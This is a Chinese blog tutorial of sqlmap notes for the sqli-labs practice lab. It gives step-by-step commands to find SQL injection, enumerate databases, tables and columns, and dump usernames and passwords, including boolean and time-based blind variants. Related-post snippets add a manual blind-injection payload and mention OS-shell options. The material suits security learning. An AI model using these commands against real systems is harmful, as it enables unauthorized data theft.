SQLMAP 使用笔记

原创 已于 2023-08-22 16:23:19 修改 · 347 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #网络安全

于 2022-10-11 08:30:16 首次发布

你还在为一个个手动输入而烦心吗?你还在为一个个SQL语句记不住而担忧吗?快来看看本教程吧ヾ(≧▽≦*)o

本文基于WSL2 KALI LINUX

安装教程就不写了,网上一大堆,实在不行就用kali呢,里面也有,开箱即用

普通注入(基于sqlilab/Less-1)

判断能不能注入

sqlmap -u http://127.0.0.1/Less-1/?id=1

结束后会给可以尝试的注入方式

查找当前数据库

sqlmap -u http://127.0.0.1/Less-1/?id=1 -dbs

# -dbs 可以理解为databases

知道了当前的库,就要查所有的表

sqlmap -u http://127.0.0.1/Less-1/?id=1 -D security --tables

# -D是指定数据库,--tables是表

知道了库名,表名,就要查列名

sqlmap -u http://127.0.0.1/Less-1/?id=1 -D security -T users --columns

# -T是指定表,--colums则是进行查列

知道了库名,表名,列名就要进行查字段

sqlmap -u http://127.0.0.1/Less-1/?id=1 -D security -T users -C "id,username,password" --dump

利用POST获取值(基于sqlilab/Less-1)

  1. 利用Burp Suite来进行抓包截取,截类似于这种界面

然后右键,点击copy to file

确认位置

sqlmap -r 文件位置及文件名称 -p uname

# -r读取文件 -p注定参数,比方说我知道了post里面有uname,那么就从uname下手,上面uname只是样例

就会显示注入方式

然后就可以用上面的参数获取各种数据

详细的可以在网上找

利用sqlmap进行布尔盲注和时间延迟注入(基于sqlilab/less-8)

利用布尔

爆数据库名

sqlmap -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique B --dbms mysql --dbs --batch --threads 10

# --techique采用的技术手段默认全部采用,在这里是B则是进行布尔盲注
# --dbms 是指定使用的数据库 mysql是当前使用数据库
# --dbs 进行查库
# --batch是不进行交互
# --threads是指线程,默认单线程,最高10线程

爆表名

sqlmap -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique B --dbms mysql -D security --tables --batch --threads 10

# 实际上改变并不大,只是稍微修改了一下,和上面讲的普通注入基本一致

爆列名

sqlmap -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique B --dbms mysql -D security -T users --column --batch --threads 10

# 不多说什么了

爆内容

sqlmap -u http://localhost:8088/sqlilabs/Less-8/?id=1 ---technique B --dbms mysql -D security -T users -C username,password --dump --batch --threads 10

利用时间盲注

爆数据库名

sqlmap -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique T --dbms mysql --dbs --batch --time-sec 3

# --time-sec限定时间,默认为5s
# 相比布尔盲注 差别并不大,只是将B改为了T,取消了多线程

爆表名

sqlmap -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique T --dbms mysql -D security --tables --batch

爆列名

sqlmap -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique T --technique T --dbms mysql -D security -T users --column --batch

爆内容

sqlmap -u http://localhost:8088/sqlilabs/Less-8/?id=1 -technique T --dbms mysql -D security -T users -C username,password --dump --batch

对于–technique的补充

参数作用
B进行布尔盲注
E报错注入
U联合查询
S多语句查询
T延时查询
Q嵌套查询注入

除了可以用单参数,也可以用双参数或者多参数.


其他常用指令

命令作用
-is-dba检查当前用户
level探测等级最低1最高5
risk风险等级最低1最高3
-dbs所有数据库
-current-db当前数据库
-users所有数据库用户
-current-user当前用户
banner返回版本信息
–user-agent设置user-agent的值
-random-agent构造随机user-agent
-password数据库密码
-proxy设置代理
【sqli-labs】Less 8——布尔盲注
用博客做做记录的小白
07-04 659
sqli-labs靶场的第8关,使用布尔盲注的方式进行解题。
墨者学院——SQL注入漏洞测试(布尔盲注)
Lollipop_zhi的博客
01-11 472
启动靶场,熟悉的界面 点击登录下方的维护通知 地址栏醒目的id出现了,尝试一下id =1’ and 1=1,空白页面 直接开kali,上sqlmap 输入sqlmap -u http://219.153.49.228:45239/new_list.php?id=1 --current -db 得到数据库名称:stormgroup 输入 sqlmap -u http://219.153.49.228:47334/new_list.php?id=1 -D stormgroup --tab..
SQL注入漏洞解析-less-8(布尔盲注)
duoba_an的博客
02-27 2273
id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))=117 --+ 爆的i。最后注入出了数据库名称,后边的就是表和列的查询,和之前的都一样,只不过这里是要用ASCII码来猜而已,就是有点慢。就这样一个一个爆,出来之后在对照ASCII码表就能查出数据。他只有对和错显示,那我们只能用对或者错误来猜他这个数据库
Sqlmap
qq_50785772的博客
10-13 408
Sqlmap url:http://10.1.26.253:8000/Less-1/?id=1 判断是否存在注入: sqlmap -u ‘http://10.1.26.253:8000/Less-1/?id=1’ 注入点后参数大于两个时,加入引号。代码反馈信息可大致分为三段,反别为:①检测可能是mysql数据库②level和risk1情况下是否使用playload检测③参数存在漏洞时,是否继续检测其他参数 注:一半默认按回车即可 判断文本中是否存在注入(burp suite) 存在cookie注入时
sqlmap注入(布尔盲注)
qq_43355651的博客
11-17 8741
本人小白 仅仅作为学习笔记 希望通过一次次的记录可以一次次的成长 sqlmap是一个自动化的sql注入工具,主要功能是扫描发现并利用注入漏洞 使用墨者学院的靶机进行测试 这里我们使用的是SQL注入漏洞测试(布尔盲注) 通过滚动条找到注入点 然后我们使用的是kali下的工具sqlmap sqlmap -u http://219.153.49.228:46473/new_lis...
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
sqlmap使用笔记1
08-03
本篇笔记将深入探讨sqlmap使用方法和功能,涵盖多个核心知识点。 1. **数据库版本探测**: 使用`-b`选项可以获取数据库版本信息,这对于识别潜在的漏洞和制定攻击策略至关重要。例如,针对不同的数据库版本,...
sqlmap 使用笔记(kali环境)
qq_40691438的博客
02-10 2564
sqlmap默认把session文件跟结果文件保存在output文件夹下,用此参数可自定义输出路径 例如:–当请求是HTTPS的时候,需要配合–force-ssl参数来使用,或者可以在Host头后面加上:443。在有些时候web服务器使用了伪静态,导致无法直接使用sqlmap测试参数,可以在想测试的参数后面加*用–os-shell参数也可以模拟一个真实的shell,可以输入你想执行的命令。输出的格式可定义为:CSV,HTML,SQLITE。参数:–os-cmd,–os-shell。文件内容直接copy。
SQLMAP使用笔记全集
05-20
收录了SQLmap使用笔记使用方法,以及讲解实例,是学习使用sqlmap应用工具的好材料
sqlmap 使用笔记1
weixin_46259951的博客
05-15 502
sqlmap 使用笔记1 仅供学习参考 MySQL 数据库 实战靶场链接 SQL手工注入漏洞测试(MySQL数据库) sqlmap使用 先介绍本次使用的软件环境 图如果看不清的话可以看这里 .............. root@linux ..,;:ccc,. ---------- ......''';lxO.
sqlmap使用教程(6)-注入技术拓展
fanmeng2008的博客
01-25 1750
选项--technique,可以用来指定SQL注入技术,默认为BEUSTQ。其中,B表示基于布尔盲注,E表示基于错误的盲注,U表示基于联合查询注入,S表示堆叠注入,T表示基于时间盲注,Q表示内联查询注入。
linux进程suspended状态,为什么在一个终端上却显示“ Suspended(tty output)”(挂起(tty输出))?...
weixin_39768645的博客
04-29 3117
显然,我在tcshshell中做了一些奇怪/错误的事情,现在每当我在后台启动一个应用程序并打印输出到标准输出时,该应用程序就会被挂起(停止)。奇怪的是,此行为仅在此终端中发生;如果我在另一个终端上执行相同的操作,则该应用程序将继续在后台运行,并将其输出打印到终端。在“中断”终端中,我必须将挂起的应用程序放回前台(使用fg),以使其继续运行。例:thehost:/tmp/test1(277)>...
sqlmap学习笔记
y4ung
07-02 4463
0x00 前言 本文是我在学习sqlmap中的笔记。刚开始学习网络安全,准备从web入手。不管怎样,加油吧! 0x01 笔记 爆库:sqlmap -u url --dbs 爆表:sqlmap -u url -D 数据库--tables 爆字段:sqlmap -u url -D 数据库-T 表名 --columns 爆字段的值:sqlmap -u url -D 数据库-T 表名 -C ...
sql注入漏洞及其sqlmap工具的使用
最新发布
Idealismi的博客
04-22 1970
代码层注入:代码层注入主要是因为,程序员在编写代码的时候、没有做严谨的代码过滤。3、攻击者的网络配置或者目标系统的操作系统原因,导致没有成功的发出或者接受。: 对所有的用户输入进行严格的验证和过滤,确保输入的数据符合预期 的格式和类型。1、首先进行判断注入点,如(get注入、post注入、cookie注入、http请求头注入等)原因:1、sql注入的语句错误、或者被目标系统采取了相应的保护措施、导致被过滤掉了。6、根据注入情况选择注入方式:时间盲注、布尔盲注、联合查询、报错注入。
frpfile官方最新绕id工具_sqlmap工具使用详解
热门推荐
weixin_39764487的博客
11-26 1万+
大家好,我是 Taicker,鄙人有幸被 38.5 挑衅了,这其中发生了什么感人至深的故事,我就不说了。先来讲sqlmap工具1.sqlmap是什么sqlmap是一款自动化的 sql 注入工具,闻名程度匹敌几年前的啊 D,他的功能很多,比如判断是否可以注入,发现,然后利用漏洞,里面也包含了许多绕 waf 的脚本,不过近两年都绕不了了,在 18 年的时候还勉强可以绕过。他支持许多数据库:M...
sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注
07-06 4008
sqlmap-跑盲注靶场】
SQLMAP进阶使用 --technique -v
Z_l123的博客
02-19 6057
实验原理 使用SQLMAP对存在POST注入点的网站进行自动化注入时,通常可以采用以下简便方法:利用Burpsuite抓包并保存HTTP request至文本文档,再利用sqlmap -r命令从文本文档中读取HTTP request并实施注入。 注入时,可以利用--technique参数指定SQLMAP使用的探测技术:B表示布尔盲注,T表示时间盲注(延迟注入),E表示报错注入,U表示联合查询注入,S表示堆查询注入;利用-v参数指定显示等级,当取值大于等于3时,将显示SQLMAP使用的payload 详情
Sqlmap参数详解
gao646467783的博客
11-21 1021
sqlmap全参数详解 sqlmap是在sql注入中非常常用的一款工具,由于其开源性,适合从个人到企业,从学习到实战,各领域各阶段的应用,我们还可以将它改造成我们自己独有的渗透利器。这款工具中,大大小小191个参数,在这篇文章中,我将一一介绍,其实很多参数我也没有使用过,所以有一些...
网络安全-sqlmap实战之sqlilabs-Less8
关注网络安全、云原生安全
06-29 1429
目录 类型 -dbs枚举数据库 --tables枚举数据库--columns枚举列 --dump枚举数据 查看源代码 类型 布尔盲注-单引号 猜测出sql语句 SELECT * FROM users where id = '参数' LIMIT 0,1 -dbs枚举数据库 使用-o参数优化,--batch参数进行跳过 python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-8/?id=1" -o -dbs --
SQLMap常用参数与功能深度解析
笔记将详细介绍SQLMap的一些核心参数和功能,以便于在实际渗透测试或安全评估中更有效地使用。 1. 常用参数: - `-u`: 这个参数用于指定要测试的URL或注入点,是SQLMap最基础的选项。 - `-f`: 通过Fingerprints...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值